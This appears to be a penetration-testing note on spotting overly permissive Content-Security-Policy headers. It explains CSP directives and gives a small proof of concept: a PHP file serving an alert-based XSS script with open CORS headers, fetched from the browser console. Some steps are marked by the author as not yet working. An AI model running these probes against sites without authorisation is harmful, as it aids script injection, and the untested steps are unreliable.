Content-Security-Policy (CSP) HTTP Header

Test for overly permissive Content Security Policy (CSP).

Table of Contents

• Examples
• Testing
• PoC
• Reference

Examples

In HTTP response headers, the content security policy header should be checked to validate that it is not too permissive.

CSP can be delivered to the user agent in different techniques.

1. Content-Security-Policy HTTP response header field. This is the most preferred technique.
2. <meta> HTML element with http-equiv attribute set to Content-Security-Policy. These elements need to be placed as early as possible in the documents.
3. Content-Security-Policy-Report-Only HTTP response header field. This header is used when the developer is unsure of the CSP behavior and wants to monitor it, instead of enforcing it.

Fetch directives are used to specify a particular category of resource that a document is allowed to load (JavaScript, CSS stylesheets, images, fonts, etc.).

script-src

Only allow scripts to be loaded from the same origin (URI scheme like HTTP + domain + port) as the page itself:

script-src 'self'

Only allow scripts to be loaded from specific domains:

script-src https://scripts.normal-website.com

frame-ancestors 'self' https://normal-website.com https://*.robust-website.com

img-src

Only allow images to be loaded from the same origin (URI scheme like HTTP + domain + port) as the page itself:

img-src 'self'

frame-ancestors

Only allow the page to be framed by other pages from the same origin:

frame-ancestors 'self'

No framing allowed at all:

frame-ancestors 'none'

default-src

Fallback for when the other CSP fetch directives that are absent:
child-src, connect-src, font-src, frame-src, img-src, manifest-src, media-src, object-src, prefetch-src, script-src, script-src-elem, script-src-attr, style-src, style-src-elem, style-src-attr, worker-src

default-src 'self';

Lock down all resources loading and then add further directives to open up the policy:

default-src 'none';

connect-src

Restricts the URLs which can be loaded using script interfaces. The following APIs are controlled by this directive:The ping attribute in “<a>” elements, , fetch(), fetchLater(), XMLHttpRequest, WebSocket, EventSource, Navigator.sendBeacon()

connect-src https://example.com/

Testing

Using Burp Suite tool, intercept requests and visit the website. The Content-Security-Policy HTTP header is not set in the server response.

• Open a browser (Chrome was used) and visit the website.
• Open the Inspector and go to the Console tab. The command demonstrate the ability to reach out to an untrusted domain.

fetch('https://loremflickr.com/320/240/alpaca')

PoC

Create file csp_poc.php

<?php
header("Content-Type: application/javascript");
header("Access-Control-Allow-Origin: *");
header("Access-Control-Allow-Headers: access");
header("Access-Control-Allow-Methods: GET, POST, PUT, OPTIONS");
header("Access-Control-Allow-Credentials: true");
?>
alert("jQuery XSS POC for: " + document.domain);

Start an HTTP server

cd <website directory>

# Python 2.7
python -m SimpleHTTPServer 80

# Python 3.x
python -m http.server

# Windows
C:\Python27\python.exe -m SimpleHTTPServer 8081

Visit the vulnerable website – the one with the CSP too permissive.

Open the web console – TO BE VALIDATED, NOT WORKING YET

$.get('http://127.0.0.1:8081/csp_poc.php')

Chrome & Firefox console – TO BE VALIDATED, NOT WORKING YET

fetch('http://127.0.0.1:8081/csp_poc.php')

Works in Chrome (returns PromiseState: fullfilled)

fetch('https://dummyimage.com/100/ff6666&text=CSP')
fetch('https://gist.github.com/modalsoul/3868393.js')

Not vulnerable if message:

Access to fetch at 'http://127.0.0.1:8081/csp_poc.php' from origin '<vulnerable url>' has been blocked by CORS policy...

Cross-Origin Request Blocked

The command demonstrate the ability to reach out to an untrusted domain to execute malicious script.

Reference

• CSP: script-src (Mozilla)
• OWASP CSP Cheat Sheet (OWASP)
• Content Security Policy (CSP) Bypass (HackTricks)
• CSP bypass: self + ‘unsafe-inline’ with Iframes (HackTricks)